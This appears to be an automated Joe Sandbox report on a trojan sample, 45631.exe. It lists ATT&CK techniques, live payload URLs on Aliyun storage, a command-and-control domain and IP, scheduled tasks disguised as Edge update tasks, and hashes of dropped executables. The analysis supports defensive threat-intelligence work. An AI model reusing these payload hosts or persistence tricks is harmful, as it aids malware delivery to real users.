Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
45631.exe	38%	Virustotal		Browse
45631.exe	29%	ReversingLabs
45631.exe	100%	Avira	HEUR/AGEN.1311196

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\K5YQV85\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\Twhtlb\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\K5YQV85\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\Twhtlb\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\K5YQV85\6WWeC.exe	0%	ReversingLabs
C:\Program Files (x86)\Twhtlb\Twhtlb.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\sgH8Ps.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://%s/%d.dll	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifa	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/##ry2ihs.oss-cn-beijing.aliyuncs.com	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/zF	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
http://%s/%d.dllC:	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/hF	0%	Avira URL Cloud	safe
http://%s/upx.rarC:	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif.i	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif(i	0%	Avira URL Cloud	safe
http://%s/ip.txtC:	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/7-2476756634-1003	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifoss-enq	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif1i	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/RF	0%	Avira URL Cloud	safe
http://%s/ip.txt	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif9i	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif-	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif5i	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Avira URL Cloud	safe
http://%s/upx.rar	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Avira URL Cloud	safe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	unknown
sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.59	true	false	high
ry2ihs.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown
ynyeqf.net	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://%s/%d.dll	Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/zF	45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://microsoft.co	45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifa	45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp	45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	189atohci.sys.0.dr, sgH8Ps.exe.0.dr	false		high
https://ry2ihs.oss-cn-beijing.aliyuncs.com/##ry2ihs.oss-cn-beijing.aliyuncs.com	45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dllC:	Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	sgH8Ps.exe.0.dr	false		high
https://ry2ihs.oss-cn-beijing.aliyuncs.com/hF	45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif.i	45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rarC:	Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/	45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif(i	45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/7-2476756634-1003	45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003	45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	189atohci.sys.0.dr, sgH8Ps.exe.0.dr	false		high
http://www.symauth.com/rpa00	sgH8Ps.exe.0.dr	false		high
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif1i	45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifoss-enq	45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif-	45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif9i	45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txt	Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/RF	45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif5i	45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.217.152.240	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
39.103.20.59	sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583301
Start date and time:	2025-01-02 12:12:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	45631.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@65/29@8/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Twhtlb.exe, PID 3744 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:14:22	Task Scheduler	Run new task: L1tAL path: C:\Users\user\Documents\sgH8Ps.exe
12:15:51	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 DQhZS path: C:\Program Files (x86)\Twhtlb\Twhtlb.exe
12:15:51	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 MulET path: C:\Program Files (x86)\K5YQV85\6WWeC.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
118.178.60.9	0000000000000000.exe	Get hash	malicious	Nitol	Browse
118.178.60.9	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	0000000000000000.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	Hilix.m68k.elf	Get hash	malicious	Mirai	Browse	8.155.218.222
	1735021454574.exe	Get hash	malicious	Unknown	Browse	120.78.149.238
	1734098836319.exe	Get hash	malicious	BlackMoon	Browse	39.103.20.61
	armv4l.elf	Get hash	malicious	Unknown	Browse	59.82.127.195
	armv6l.elf	Get hash	malicious	Unknown	Browse	39.106.221.219
	DF2.exe	Get hash	malicious	Unknown	Browse	59.110.52.4
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	121.198.26.154
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	47.103.186.206
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	8.130.21.60
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	Hilix.m68k.elf	Get hash	malicious	Mirai	Browse	8.155.218.222
	1735021454574.exe	Get hash	malicious	Unknown	Browse	120.78.149.238
	1734098836319.exe	Get hash	malicious	BlackMoon	Browse	39.103.20.61
	armv4l.elf	Get hash	malicious	Unknown	Browse	59.82.127.195
	armv6l.elf	Get hash	malicious	Unknown	Browse	39.106.221.219
	DF2.exe	Get hash	malicious	Unknown	Browse	59.110.52.4
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	121.198.26.154
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	47.103.186.206
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	8.130.21.60
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	Hilix.mpsl.elf	Get hash	malicious	Mirai	Browse	8.208.198.92
	0000000000000000.exe	Get hash	malicious	Nitol	Browse	8.217.35.192
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	8.211.209.238
	letsVPN.exe	Get hash	malicious	Unknown	Browse	8.223.56.120
	letsVPN.exe	Get hash	malicious	Unknown	Browse	8.223.56.120
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	8.212.101.195
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	8.212.101.195
	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	149.129.12.34
	V2clgnyM2J.exe	Get hash	malicious	GhostRat	Browse	8.218.163.85
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.90.135.102

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	1734098836319.exe	Get hash	malicious	BlackMoon	Browse	39.103.20.59 118.178.60.9
	ETVk1yP43q.exe	Get hash	malicious	AZORult	Browse	39.103.20.59 118.178.60.9
	16oApcahEa.exe	Get hash	malicious	Babuk, Djvu	Browse	39.103.20.59 118.178.60.9
	6a7e35.msi	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.9
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.9
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.9
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.9
	0000000000000000.exe	Get hash	malicious	Nitol	Browse	39.103.20.59 118.178.60.9
	0000000000000000.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\K5YQV85\6WWeC.exe	0000000000000000.exe	Get hash	malicious	Nitol	Browse
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse
C:\Program Files (x86)\Twhtlb\Twhtlb.exe	0000000000000000.exe	Get hash	malicious	Nitol	Browse
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\K5YQV85\6WWeC.exe

Download File

Process:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 0000000000000000.exe, Detection: malicious, Browse Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\K5YQV85\log.src

Download File

Process:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955228974415
Encrypted:	true
SSDEEP:	98304:0OQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:zo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	44488644EA5EE02A9701A8B070AC631D
SHA1:	168A3E17F7E5CF88C99C06718A419374C5131176
SHA-256:	E8376791140227FB7081204DA98DB8B854B128AF2D0D5699028756BD385ECC7B
SHA-512:	83766AECD65536144C27C7D5B253166FCD24266A47FB05A14087E1713CF17F261F0747A8169A4070F9F49C6E9ED653D630640D22ADB504427B89F9E129EE1B2B
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..$..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\K5YQV85\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516607335549
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/i:9S4+O6P5OeMRrjRy7aPZbm3k8V/i
MD5:	9FB3237988634D1F51DD335A31055320
SHA1:	F7D610181DA513F9181A9EECA8FA7D314824CD90
SHA-256:	123DA4A8B1168E0240EDEA24D3635BB47241320201523BAC84A2CAB832029B69
SHA-512:	EEE888C1FEE605A5ADA9D7365E4D06E26D96DB48DD8B87143FD957F9E2D98808E28E024625573A9E4531E649C48A9C4F12B3048C098C14291F1850D745AF480D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\K5YQV85\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399980442188
Encrypted:	true
SSDEEP:	6144:EiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:z8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	642FC9A3288A07FB1140F21BEB35A014
SHA1:	6DAFBC9D4817DA3F4C4B260EA6384B6FF487E8C1
SHA-256:	0D431D1EA9C96345780C4BDE38C83553128B5E44A1D148E9CB95EE04C10DB73A
SHA-512:	261D41300C575D8E137178F47AA742F9E7298AE34C43DDB8EA086B8DA6A039B298820ED51E6A6C9CCDF98CF415DDCDF159DCE046C90624A1994B6B03542537D4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......$...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.152.240...."ijstuvwxyz....ynyeqf.net......3#..............152.24....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|